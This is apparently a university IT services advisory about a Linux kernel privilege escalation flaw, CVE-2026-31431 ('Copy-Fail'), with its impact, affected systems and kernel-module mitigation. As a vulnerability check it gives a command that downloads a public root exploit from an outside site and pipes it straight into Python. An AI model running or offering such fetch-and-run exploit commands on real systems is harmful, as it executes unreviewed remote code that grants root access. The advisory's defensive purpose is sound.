University IT Services logo
University IT Services
University IT Services
University IT Services
Communications

“Copy-Fail” vulnerability in the Linux kernel (CVE-2026-31431)

May 5, 2026

CVE-2026-31431, known as “Copy-Fail,” affects the Linux kernel and allows a local user to gain administrator (root) privileges. It is a privilege escalation vulnerability that can only be exploited by someone who already has access to the system.

 

Impact

The vulnerability has a CVSS score of approximately 7.8. It is not remotely exploitable, but it can be used in local attack scenarios.

The impact is greater on multi-user systems (shared servers, HPC environments), while it is limited on single-user personal machines.

Systems affected

 
ICONA PC

macOS

Not affected

 

WSL (Windows Subsystem for Linux)

May be affected – see https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/96

  1. Update the Linux kernel to the correct version as soon as it becomes available.
  2. If updates are not available, apply a temporary mitigation by disabling the vulnerable module.
  3. Reboot the system after applying the mitigation. 

The algif_aead module can either be compiled directly into the kernel or loaded dynamically via modprobe, depending on the Linux distribution in use.

  • If the algif_aead module is loaded dynamically: disable it following the appropriate procedure for the specific distribution.
  • If the algif_aead module is built into the kernel: prevent it from initializing at boot by setting the kernel parameter:
    initcall_blacklist=algif_aead_init

If the system is up to date or the mitigation has been correctly applied, the publicly available proof-of-concept should not allow privilege escalation.

By running:

curl https://copy.fail/exp | python3 && su && whoami

if no exceptions are generated and the returned username is “root”, then your system is vulnerable.

 

The Cybersecurity Service of the Politecnico has:

  • Informed the IT contacts of the departments
  • Provided technical guidance and support
  • Assisted in implementing countermeasures on critical infrastructures

In any case, it is always recommended to avoid executing unverified code from the Internet.

Useful links

For official updates and security and technical information, please consult:

ACN – CSIRT Italia (security advisories and alerts)
National Vulnerability Database (NVD) – CVE-2026-31431
Analysis of the “Copy-Fail” vulnerability
 
icona docenti

Who is intended for

 
icona docenti

Faculty

 
icona studenti

Researchers and PhD students

 
icona personale tecnico amministrativo bibliotecario

Technical, administrative, and library staff